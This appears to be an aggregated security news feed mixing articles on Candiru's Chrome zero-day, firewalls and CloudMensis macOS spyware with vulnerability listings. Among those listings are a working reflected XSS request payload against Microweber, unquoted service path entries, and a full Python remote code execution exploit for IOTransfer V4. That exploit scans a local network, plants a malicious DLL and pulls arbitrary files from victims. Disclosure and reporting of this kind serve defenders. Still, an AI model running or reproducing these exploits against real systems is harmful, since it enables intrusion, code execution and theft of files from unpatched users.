By Deeba Ahmed
The spyware vendor Candiru used the Chrome zero-day in March 2022 to target journalists and other unsuspected victims…
This is a post from HackRead.com Read the original post: Israeli Spyware Vendor Uses Chrome 0day to Target Journalists

****The spyware vendor Candiru used the Chrome zero-day in March 2022 to target journalists and other unsuspected victims in Palestine, Turkey, and Yemen and Lebanese journalists.****

Antivirus firm Avast has identified a serious flaw in the Chrome browser. According to Avast’s report, the Chrome browser vulnerability, which Google patched earlier this month, is tracked as CVE-2022-2294.

The vulnerability is linked to Candiru aka Saito Tech, an Israel-based spyware vendor that offers governments hacking-for-hire services. It is worth noting that the flaw was identified by Avast and disclosed to Google on 1st July 2022, and a fix was released on 4th July with Chrome 103.

**Vulnerability Details**

Avast reported that someone exploited the zero-day flaw already to spy on Lebanese journalists. Like NSO Group’s Pegasus Spyware, Candiru’s spyware is also used by law enforcement agencies and governments to confront crime and terrorism.

However, as per Avast’s research, Candiru’s spyware was used to target political dissidents, journalists, and critics of authoritarian and repressive regimes. The US Commerce Department sanctioned Candiru for its involvement in anti-US activities.

**Who Were the Targets?**

According to Avast, Candiru used the Chrome zero-day in March 2022 to target people in Palestine, Turkey, and Yemen and Lebanese journalists. In Lebanon, Candiru also compromised a news agency website.

The screenshot shared by Avast shows the malicious code injected into the compromised website stylishblockcom

Avast malware researcher Jan Vojtěšek stated that it is currently unclear why the attackers targeted people in the Middle East, particularly journalists. However, the company is sure that its primary objective was to spy on them and collect sensitive data and information. Such an attack is a blatant violation of freedom of speech and press freedom.

**How Was Zero-Day Exploited?**

As per the Avast report, the attacker planted the Chrome zero-day exploit on the Lebanese news agency website to collect 50 data points from the target’s browser, which includes timezone, language, screen information, browser plugins, device type, and device memory.

Hence, the attacker ensured their target’s device was fully compromised before delivering the spyware payload, which Avast claims matches a Windows-based malware DevilsTongue and Microsoft uncovered it in a previous attack involving Candiru.

It is worth noting that this is government-grade spyware capable of stealing messages, call logs, and photos from the victim’s phone, as well as tracking their location in real-time. Users must quickly update the Chrome browser to stay protected. Separate patches have been released by Apple Safari and Microsoft Edge as these use WebRTC.

Your Chrome browser is likely one of the most important pieces of software on your computer. It’s where you do all your online work, so keeping it up-to-date is essential for your security and productivity. Here’s how to update Chrome on Windows, Mac, and Linux:

**Windows:** Open Chrome and go to the menu in the top right corner. Click “Help” and then “About Google Chrome.” If there’s an update available, you’ll be able to download it from there.

**Mac:** Open Chrome and go to the menu in the top left corner. Click “Chrome” and then “About Google Chrome.” If there’s an update available, you’ll be able to download it from there.

**Linux:** Open a terminal window and type “sudo apt update && sudo apt upgrade google-chrome-stable.

**More Chrome and Spyware News**

1.  5 Ways to Protect Your Privacy on Google Chrome
2.  Predator Spyware Using Zero-day to Target Android Devices
3.  iPhones of 9 State Dept officials hijacked by NSO Pegasus spyware
4.  Pakistani Android users hit by spyware campaign with malicious apps
5.  ISPs Helping Attackers Install Hermit Spyware on Smartphones- Google

Israeli Spyware Vendor Uses Chrome 0day to Target Journalists

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.21.

**Description**

Hi team, I found XSS at /module/.

**Proof of Concept**

Pop up POC: 

Reflected POC: 

Full request payload:

    POST /demo/module/ HTTP/1.1
    Host: demo.microweber.org
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 183
    Origin: https://demo.microweber.org
    Referer: https://demo.microweber.org/demo/shop
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: cross-site
    Te: trailers
    Connection: close
    
    type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings
    

**Impact**

XSS

**Occurrences**

index.php L80-L92

This function does not filter 'id' parameter in script tag, which allows attackers to escape syntax using apostrophe.

CVE-2022-2470: Cross-site Scripting (XSS) - Reflected in microweber

Understanding the limitations of firewalls is important to protecting the organization from evolving threats.

Firewalls were born in the 1990s, alongside Windows 95 and Internet Explorer. They've been a staple of network security since, which prompts the question: Are firewalls still relevant? The determining factor is whether firewalls have grown with the changes we've seen in technology or if they've just stayed in line with the technology of the 1990s and early 2000s.

**How Firewalls Work & How They Don't**

Firewalls work primarily on the principle of deep packet inspection. Data packets are the units of information that constitute any type of Internet traffic, including Web traffic. They protect networks by checking the payload of every data packet trying to enter or leave a network and blocking any packets that contain malicious content. Content typically is defined as malicious through a series of rather complex policies and rules.

Today, data is almost always encrypted. Encryption ensures that good incoming and outgoing traffic is protected from prying eyes, but, unfortunately, it also hides bad incoming and outgoing traffic. Some firewalls can de-encrypt data packets, check their payload, and then re-encrypt them, but this process is computationally intensive and can bog down the network significantly. Also, this process is not always an available option given how many modern security protocols block the types of man-in-the-middle operations required for full-blown SSL inspection.

**Leveraging IP Addresses**

Indeed, deep packet inspection is becoming an antiquated security practice, but there are other ways to identify whether specific activity is malicious.

For example, some organizations blacklist malicious Web domains, then automatically block traffic from those sites, while others use tactics such as SIEM log analysis. However, these types of monitoring and alert systems are reactive: They tell you that you've been attacked, but don't block the malicious traffic that can cause an attack.

I staunchly believe in multifaceted security, with a simple set of three starting points:

1.  Don't reuse passwords.
2.  Regularly update your software.
3.  Use the truest lowest-common-denominator of Internet traffic — the IP address itself — to your advantage, as a key foundational tenet of your cyber security stack.

It's the third leg of that stool that can help ensure that your organization achieves a proactive posture when it comes to malicious traffic.

Since all traffic is identified by a unique IP address, focusing on IP is a simple way to identify and block any packets coming from or going to known malicious sources — without ever needing to check their contents. It doesn't matter if the data being transferred is encrypted or not.

Surprisingly to some, firewalls can't and don't perform this function very well because you need a very different hardware and software architecture to achieve deep packet inspection versus achieving IP filtering at scale.

**Conclusion**

While firewalls are a very important tool in organizations' security arsenals, it's important to align security solutions with security threats. As cyberattacks evolve, organizations should consider the kinds of tools that will be needed to complement and shore up firewall protection.

What Firewalls Can — and Can't — Accomplish

The actively exploited but now-fixed Google Chrome zero-day flaw that came to light earlier this month was weaponized by an Israeli spyware company and used in attacks targeting journalists in the Middle East.
Czech cybersecurity firm Avast linked the exploitation to Candiru (aka Saito Tech), which has a history of leveraging previously unknown flaws to deploy a Windows malware dubbed

The actively exploited but now-fixed Google Chrome zero-day flaw that came to light earlier this month was weaponized by an Israeli spyware company and used in attacks targeting journalists in the Middle East.

Czech cybersecurity firm Avast linked the exploitation to Candiru (aka Saito Tech), which has a history of leveraging previously unknown flaws to deploy a Windows malware dubbed **DevilsTongue**, a modular implant with Pegasus\-like capabilities.

Candiru, along with NSO Group, Computer Security Initiative Consultancy PTE. LTD., and Positive Technologies, were added to the entity list by the U.S. Commerce Department in November 2021 for engaging in "malicious cyber activities."

"Specifically, a large portion of the attacks took place in Lebanon, where journalists were among the targeted parties," security researcher Jan Vojtěšek, who reported the discovery of the flaw, said in a write-up. "We believe the attacks were highly targeted."

The vulnerability in question is CVE-2022-2294, memory corruption in the WebRTC component of the Google Chrome browser that could lead to shellcode execution. It was addressed by Google on July 4, 2022. The same issue has since been patched by Apple and Microsoft in Safari and Edge browsers.

The findings shed light on multiple attack campaigns mounted by the Israeli hack-for-hire vendor, which is said to have returned with a revamped toolset in March 2022 to target users in Lebanon, Turkey, Yemen, and Palestine via watering hole attacks using zero-day exploits for Google Chrome.

The infection sequence spotted in Lebanon commenced with the attackers compromising a website used by employees of a news agency to inject malicious JavaScript code from an actor-controlled domain that's responsible for redirecting potential victims to an exploit server.

Via this watering hole technique, a profile of the victim's browser, consisting of about 50 data points, is created, including details like language, timezone, screen information, device type, browser plugins, referrer, and device memory, among others.

Avast assessed the information was gathered to ensure that the exploit was being delivered only to the intended targets. Should the collected data be deemed of value by the hackers, the zero-day exploit is then delivered to the victim's machine over an encrypted channel.

The exploit, in turn, abuses the heap buffer overflow in WebRTC to attain shellcode execution. The zero-day flaw is said to have been chained with a sandbox escape exploit (that was never recovered) to gain an initial foothold, using it to drop the DevilsTongue payload.

While the sophisticated malware is capable of recording the victim's webcam and microphone, keylogging, exfiltrating messages, browsing history, passwords, locations, and much more, it has also been observed attempting to escalate its privileges by installing a vulnerable signed kernel driver ("HW.sys") containing a third zero-day exploit.

Earlier this January, ESET explained how vulnerable signed kernel drivers - an approach called Bring Your Own Vulnerable Driver (BYOVD) - can become unguarded gateways for malicious actors to gain entrenched access to Windows machines.

The disclosure comes a week after Proofpoint revealed that nation-state hacking groups aligned with China, Iran, North Korea, and Turkey have been targeting journalists to conduct espionage and spread malware since early 2021.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Candiru Spyware Caught Exploiting Google Chrome Zero-Day to Target Journalists

Kite version 1.2021.610.0 suffers from an unquoted service path vulnerability.

    # Exploit Title: Kite 1.2021.610.0 - Unquoted Service Path# Date: 2020-11-6# Exploit Author: Ghaleb Al-otaibi# Vendor Homepage: https://www.kite.com/# Version: Version 4.2.0.1 U1# Tested on: Microsoft Windows 10 Pro - 10.0.19044 N/A Build 19044# CVE : NA# Service info:C:\Windows\system32\cmd.exe>sc qc KiteService[SC] QueryServiceConfig SUCCESSSERVICE_NAME: KiteService        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 0   IGNORE        BINARY_PATH_NAME   : C:\Program Files\Kite\KiteService.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : KiteService        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem

Kite 1.2021.610.0 Unquoted Service Path

The CloudMensis spyware, which can lift reams of sensitive information from Apple machines, is the first Mac malware observed to exclusively rely on cloud storage for C2 activities.

A previously unknown macOS spyware has surfaced in a highly targeted campaign, which exfiltrates documents, keystrokes, screen captures, and more from Apple machines. Interestingly, it exclusively uses public cloud-storage services for housing payloads and for command-and-control (C2) communications — an unusual design choice that makes it difficult to trace and analyze the threat.

Dubbed CloudMensis by the researchers at ESET who discovered it, the backdoor was developed in Objective-C. ESET's analysis of the malware released this week shows that after initial compromise, the cyberattackers behind the campaign gain code execution and privilege escalation using known vulnerabilities. Then, they install a first-stage loader component that retrieves the actual spyware payload from a cloud storage provider. In the sample the firm analyzed, pCloud was used to store and deliver the second stage, but the malware also supports Dropbox and Yandex as cloud repositories.

The spy component then sets about harvesting a bevy of sensitive data from the compromised Mac, including files, email attachments, messages, audio recordings, and keystrokes. In all, researchers said it supports 39 different commands, including a directive to download additional malware.

All of the ill-gotten data is encrypted using a public key found in the spy agent; and it requires a private key, owned by the CloudMensis operators, for its decryption, according to ESET.

**Spyware in the Cloud**

The most notable aspect of the campaign, other than the fact that Mac spyware is a rare find, is its exclusive use of cloud storage, according to the analysis.

"CloudMensis perpetrators create accounts on cloud-storage providers such as Dropbox or pCloud," Marc-Etienne M.Léveillé, senior malware researcher at ESET, explains to Dark Reading. "The CloudMensis spyware contains authentication tokens that allow them to upload and download files from these accounts. When the operators want to send a command to one of its bots, they upload a file to the cloud storage. The CloudMensis spy agent will fetch that file, decrypt it, and run the command. The result of the command is encrypted and uploaded to the cloud storage for the operators to download and decrypt."

This technique means that there are no domain name nor IP address in the malware samples, he adds: "The absence of such indicator makes it difficult to track infrastructure and block CloudMensis at the network level."

While a notable approach, it's been used in the PC world before by groups like Inception (aka Cloud Atlas) and APT37 (aka Reaper or Group 123). However, "I think it is the first time we've seen it in Mac malware," M.Léveillé notes.

**Attribution, Victimology Remain a Mystery**

So far, things are, well, cloudy when it comes to the provenance of the threat. One thing that's clear is that the intention of the perpetrators is espionage and intellectual property theft — potentially a clue as to the type of threat, since spying is traditionally the domain of advanced persistent threats (APTs).

However, the artifacts ESET was able to uncover from the attacks showed no ties to known operations.

"We could not attribute this campaign to a known group, neither from the code similarity or infrastructure," M.Léveillé says.

Another clue: The campaign is also tightly targeted — usually the hallmark of more sophisticated actors.

"Metadata from cloud storage accounts used by CloudMensis revealed the samples we analyzed has run on 51 Macs between Feb. 4 and Apr. 22," M.Léveillé says. Unfortunately, "we have no information about the geolocation or vertical of the victims because files are deleted from the cloud storage."

However, countering the APT-ish aspects of the campaign, the sophistication level of the malware itself is not that impressive, ESET noted.

"The general quality of the code and lack of obfuscation shows the authors may not be very familiar with Mac development and are not so advanced," according to the report.

M.Léveillé characterizes CloudMensis as a medium-advanced threat, and noted that unlike NSO Group's formidable Pegasus spyware, CloudMensis builds no zero-day exploits into its code.

"We did not see CloudMensis use undisclosed vulnerabilities to bypass Apple's security barriers," says M.Léveillé. "However, we did find that CloudMensis used known vulnerabilities (also known as one-day or n-day) on Macs that do not run the latest version of macOS \[to bypass security mitigations\]. We do not know how the CloudMensis spyware is installed on victims' Macs so perhaps they do use undisclosed vulnerabilities for that purpose, but we can only speculate. This places CloudMensis somewhere in the middle in the scale of sophistication, more than average, but not the most sophisticated either."

**How to Protect Your Business from CloudMensis & Spyware**

To avoid becoming a victim of the CloudMensis threat, the use of vulnerabilities to work around macOS mitigations means that running up-to-date Macs is the first line of defense for businesses, according to ESET. Though the initial-compromise vector isn't known in this case, implementing all the rest of the basics like strong passwords and phishing-awareness training is also a good defense.

Researchers also recommended turning on Apple's new Lockdown Mode feature.

"Apple has recently acknowledged the presence of spyware targeting users of its products and is previewing Lockdown Mode on iOS, iPadOS, and macOS, which disables features frequently exploited to gain code execution and deploy malware," according to the analysis. "Disabling entry points, at the expense of a less fluid user experience, sounds like a reasonable way to reduce the attack surface."

Above all, M.Léveillé cautions businesses against being lulled into a false sense of security when it comes to Macs. While malware targeting Macs has traditionally been less prevalent than Windows or Linux threats, that is now changing.

"Businesses using Macs in their fleet should protect them the same way they would protect computers running Windows or any other operating systems," he warns. "With the Mac sales increasing year after year, their users have become an interesting target for financially motivated criminals. State-sponsored threat groups also have the resources to adapt to their targets and develop the malware they need to fulfill their missions, regardless of the operating system."

Mysterious, Cloud-Enabled macOS Spyware Blows Onto the Scene

Dr. Fone version 4.0.8 suffers from an unquoted service path vulnerability.

**Dr. Fone 4.0.8 Unquoted Service Path**

    # Exploit Title: Dr. Fone v4.0.8- 'net_updater32.exe' Unquoted Service Path# Discovery Date: 2022-05-07# Discovery by: Esant1490# Vendor Homepage: https://drfone.wondershare.net# Software Link : https://download.wondershare.net/drfone_full4008.exe# Tested Version: 4.0.8# Tested on OS: Windows 10 Pro x64 en# Vulnerability Type: Unquoted Service Path# Find the discover Unquoted Service Path Vulnerability:C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "C:\Windows\\" |findstr /i /v """Wondershare Install Assist Service Wondershare InstallAssistC:\ProgramData\Wondershare\Service\InstallAssistService.exe AutoWondershare Application Framework Service WsAppService C:\Program Files(x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe AutoWondershare Application Update Service 3.0WsAppService3 C:\Program Files(x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe AutoWondershare Driver Install Service WsDrvInst C:\Program Files(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto# Service info:C:\>sc qc WsDrvInst[SC] QueryServiceConfig CORRECTONOMBRE_SERVICIO: WsDrvInstTIPO : 10 WIN32_OWN_PROCESSTIPO_INICIO : 2 AUTO_STARTCONTROL_ERROR : 1 NORMALNOMBRE_RUTA_BINARIO: C:\Program Files(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exeGRUPO_ORDEN_CARGA :ETIQUETA : 0NOMBRE_MOSTRAR : Wondershare Driver Install ServiceDEPENDENCIAS : RPCSSNOMBRE_INICIO_SERVICIO: LocalSystem#Exploit:A successful attempt to exploit this vulnerability could allow to executecode during startup or reboot with the elevated privileges.

Dr. Fone 4.0.8 Unquoted Service Path

IOTransfer version 4.0 suffers from a remote code execution vulnerability.

    # Exploit Title: IOTransfer V4 – Remote Code Execution (RCE)# Date: 06/22/2022# Exploit Author: Tomer Peled# Vendor Homepage: https://www.iobit.com# Software Link: https://iotransfer.itopvpn.com/# Version: V4 and onward# Tested on: Windows 10# CVE : 2022-24562# References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562import osfrom urllib3.exceptions import ConnectTimeoutErrorfrom win32com.client import *import requestsimport jsonlocalPayloadPath = r"c:\temp\malicious.dll"remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll"remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf'Range = "192.168.89"UpOrDown="Upload"IP = ""UserName = ""def get_version_number(file_path):    information_parser = Dispatch("Scripting.FileSystemObject")    version = information_parser.GetFileVersion(file_path)    return versiondef getTaskList(IP, taskid=""):    print("Getting task list...")    url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*'    res = requests.get(url)    tasks = json.loads(res.content)    tasks = json.loads(tasks['content'])    for task in tasks['tasks']:        if taskid == task['taskid']:            print(f"Task ID found: {taskid}")def CreateUploadTask(IP):    SetSavePath(IP)    url = f'http://{IP}:7193/index.php?action=createtask'    task = {        'method': 'get',        'version': '1',        'userid': '*',        'taskstate': '0',    }    res = requests.post(url, json=task)    task = json.loads(res.content)    task = json.loads(task['content'])    taskid = task['taskid']    print(f"[*] TaskID: {taskid}")    return taskiddef CreateUploadDetailNode(IP, taskid, remotePath, size='100'):    url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0'    file_info = {        'size': size,        'savefilename': remotePath,        'name': remotePath,        'fullpath': r'c:\windows\system32\calc.exe',        'md5': 'md5md5md5md5md5',        'filetype': '3',    }    res = requests.post(url, json=file_info)    js = json.loads(res.content)    print(f"[V] Create Detail returned: {js['code']}")def readFile(Path):    file = open(Path, "rb")    byte = file.read(1)    next = "Start"    while next != b'':        byte = byte + file.read(1023)        next = file.read(1)        if next != b'':            byte = byte + next    file.close()    return bytedef CallUpload(IP, taskid, localPayloadPath):    url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0'    send_data = readFile(localPayloadPath)    try:        res = requests.post(url, data=send_data)        js = json.loads(res.content)        if js['code'] == 200:            print("[V] Success payload uploaded!")        else:            print(f"CreateRemoteFile: {res.content}")    except:        print("[*] Reusing the task...")        res = requests.post(url, data=send_data)        js = json.loads(res.content)        if js['code'] == 200 or "false" in js['error']:            print("[V] Success payload uploaded!")        else:            print(f"[X] CreateRemoteFile Failed: {res.content}")def SetSavePath(IP):    url = f'http://{IP}:7193/index.php?action=setiotconfig'    config = {        'tasksavepath': 'C:\\Program '    }    requests.post(url, json=config)def ExploitUpload(IP,payloadPath,rPath,taskid =None):    if not taskid:        taskid = CreateUploadTask(IP)        size = os.path.getsize(payloadPath)    CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size))    CallUpload(IP, taskid, payloadPath)def CreateDownloadTask(IP, Path) -> str:    url = f'http://{IP}:7193/index.php?action=createtask'    task = {        'method': 'get',        'version': '1',        'userid': '*',        'taskstate': '0',        'filepath': Path    }    res = requests.post(url, json=task)    task = json.loads(res.content)    task = json.loads(task['content'])    taskid = task['taskid']    print(f"TaskID: {taskid}")    return taskiddef ExploitDownload(IP, DownloadPath, ID=None):    if ID:        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}'    else:        taskid = CreateDownloadTask(IP, DownloadPath)        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}'    res = requests.get(url)    return resdef ScanIP(startRange):    print("[*] Searching for vulnerable IPs", end='')    Current = 142    IP = f"{startRange}.{Current}"    VulnerableIP: str = ""    UserName: str = ""    while Current < 252:        print(".", end='')        url = f'http://{IP}:7193/index.php?action=getpcname&userid=*'        try:            res = requests.get(url, timeout=1)            js = json.loads(res.content)            js2 = json.loads(js['content'])            UserName = js2['name']            VulnerableIP=IP            print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}")            print(f"[!] Vulnerable PC username: {UserName}")            return VulnerableIP,UserName        except Exception as e:            pass        except ConnectTimeoutError:            pass        IP = f"{startRange}.{Current}"        Current = Current + 1    return None,Noneif __name__ == '__main__':    IP,UserName = ScanIP(Range)    if IP is None or UserName is None:        print("[X] No vulnerable IP found")        exit()    print("[*] Starting Exploit...")    if UpOrDown == "Upload":        print(f"[*]Local Payload Path: {localPayloadPath}")        print(f"[*]Remote Upload Path: {remotePayloadPath}")        ExploitUpload(IP,localPayloadPath,remotePayloadPath)    elif UpOrDown == "Download":        print(f"[*] Downloading the file: {remoteDownloadPath}")        res = ExploitDownload(IP, remoteDownloadPath)        file = open("out.pdf", "wb+")        file.write(res.content)        file.close()

IOTransfer 4.0 Remote Code Execution

Unauthenticated WordPress Options Change vulnerability in Biplob Adhikari's Accordions plugin <= 2.0.2 at WordPress.

CVE-2022-33198: Accordions – Multiple Accordions or FAQs Builder

Authenticated (custom plugin role) Arbitrary File Read via Export function vulnerability in GiveWP's GiveWP plugin <= 2.20.2 at WordPress.

Tag

#windows